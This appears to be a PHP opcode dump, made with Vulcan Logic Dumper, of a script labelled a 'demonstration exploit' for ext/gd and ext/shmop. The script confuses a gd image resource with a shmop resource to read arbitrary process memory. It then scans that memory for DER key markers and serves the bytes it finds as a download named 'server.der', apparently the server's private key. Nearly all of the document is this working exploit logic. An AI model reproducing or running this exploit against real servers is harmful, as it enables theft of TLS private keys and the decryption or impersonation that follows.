Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 79) Position 1 = -2
filename: /in/CJptn
function name: (null)
number of ops: 77
compiled vars: !0 = $offset, !1 = $data, !2 = $position, !3 = $length, !4 = $keydata
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
16 0 E > > EXIT 'REMOVE+THIS+LINE'
18 1* INIT_FCALL 'extension_loaded'
2* SEND_VAL 'gd'
3* DO_ICALL $5
4* BOOL_NOT ~6 $5
5* JMPNZ_EX ~6 ~6, ->11
6* INIT_FCALL 'extension_loaded'
7* SEND_VAL 'shmop'
8* DO_ICALL $7
9* BOOL_NOT ~8 $7
10* BOOL ~6 ~8
11* JMPZ ~6, ->13
19 12* EXIT 'This+demonstration+exploit+only+works+with+ext%2Fgd+and+ext%2Fshmop+loaded.'
41 13* INIT_FCALL 'init'
14* DO_FCALL 0
43 15* ASSIGN !0, 134578176
45 16* JMP ->68
47 17* INIT_FCALL 'peek'
18* SEND_VAR !0
19* SEND_VAL 1040
20* DO_FCALL 0 $11
21* ASSIGN !1, $11
49 22* INIT_FCALL 'strpos'
23* SEND_VAR !1
24* SEND_VAL '0%82'
25* DO_ICALL $13
26* ASSIGN !2, $13
50 27* TYPE_CHECK 1018 ~15 !2
28* JMPZ_EX ~15 ~15, ->31
29* IS_SMALLER ~16 !2, 1024
30* BOOL ~15 ~16
31* JMPZ ~15, ->67
52 32* INIT_FCALL 'substr'
33* SEND_VAR !1
34* ADD ~17 !2, 4
35* SEND_VAL ~17
36* SEND_VAL 4
37* DO_ICALL $18
38* IS_EQUAL $18, '%02%01%00%02'
39* JMPZ ~19, ->67
53 40* INIT_FCALL 'ord'
41* ADD ~20 !2, 2
42* FETCH_DIM_R ~21 !1, ~20
43* SEND_VAL ~21
44* DO_ICALL $22
45* MUL ~23 $22, 256
46* INIT_FCALL 'ord'
47* ADD ~24 !2, 3
48* FETCH_DIM_R ~25 !1, ~24
49* SEND_VAL ~25
50* DO_ICALL $26
51* ADD ~27 ~23, $26
52* ADD ~28 ~27, 4
53* ASSIGN !3, ~28
54 54* INIT_FCALL 'peek'
55* ADD ~30 !0, !2
56* SEND_VAL ~30
57* SEND_VAR !3
58* DO_FCALL 0 $31
59* ASSIGN !4, $31
56 60* INIT_FCALL 'strpos'
61* SEND_VAR !4
62* SEND_VAL '%01%00%01'
63* DO_ICALL $33
64* IS_SMALLER 0, $33
65* JMPZ ~34, ->67
57 66* JMP ->69
60 67* ASSIGN_OP 1 !0, 1024
45 68* JMPNZ 1, ->17
63 69* INIT_FCALL 'header'
70* SEND_VAL 'Content-type%3A+application%2Foctet-stream'
71* DO_ICALL
64 72* INIT_FCALL 'header'
73* SEND_VAL 'Content-Disposition%3A+attachment%3B+filename%3D%22server.der%22'
74* DO_ICALL
65 75* ECHO !4
66 76* > RETURN 1
Function init:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/CJptn
function name: init
number of ops: 19
compiled vars: !0 = $rid
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
24 0 E > BIND_GLOBAL !0, 'rid'
26 1 INIT_FCALL_BY_NAME 'imagecreate'
2 SEND_VAL_EX 10
3 SEND_VAL_EX 10
4 DO_FCALL 0 $1
5 ASSIGN !0, $1
27 6 INIT_FCALL_BY_NAME 'imagecolorallocate'
7 SEND_VAR_EX !0
8 SEND_VAL_EX 0
9 SEND_VAL_EX 0
10 SEND_VAL_EX 0
11 DO_FCALL 0
28 12 INIT_FCALL_BY_NAME 'imagecolorallocate'
13 SEND_VAR_EX !0
14 SEND_VAL_EX 0
15 SEND_VAL_EX 0
16 SEND_VAL_EX 0
17 DO_FCALL 0
29 18 > RETURN null
End of function init
Function peek:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/CJptn
function name: peek
number of ops: 31
compiled vars: !0 = $addr, !1 = $size, !2 = $rid
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
31 0 E > RECV !0
1 RECV !1
33 2 BIND_GLOBAL !2, 'rid'
34 3 INIT_FCALL_BY_NAME 'imagecolordeallocate'
4 SEND_VAR_EX !2
5 SEND_VAL_EX 0
6 DO_FCALL 0
35 7 INIT_FCALL_BY_NAME 'imagecolordeallocate'
8 SEND_VAR_EX !2
9 SEND_VAL_EX 1
10 DO_FCALL 0
36 11 INIT_FCALL_BY_NAME 'imagecolorallocate'
12 SEND_VAR_EX !2
13 SEND_VAR_EX !0
14 SEND_VAL_EX 0
15 SEND_VAL_EX 0
16 DO_FCALL 0
37 17 INIT_FCALL_BY_NAME 'imagecolorallocate'
18 SEND_VAR_EX !2
19 SEND_VAR_EX !1
20 SEND_VAL_EX 0
21 SEND_VAL_EX 0
22 DO_FCALL 0
38 23 INIT_FCALL_BY_NAME 'shmop_read'
24 CAST 4 ~7 !2
25 SEND_VAL_EX ~7
26 SEND_VAL_EX 0
27 SEND_VAR_EX !1
28 DO_FCALL 0 $8
29 > RETURN $8
39 30* > RETURN null
End of function peek
Generated using Vulcan Logic Dumper, using php 8.0.0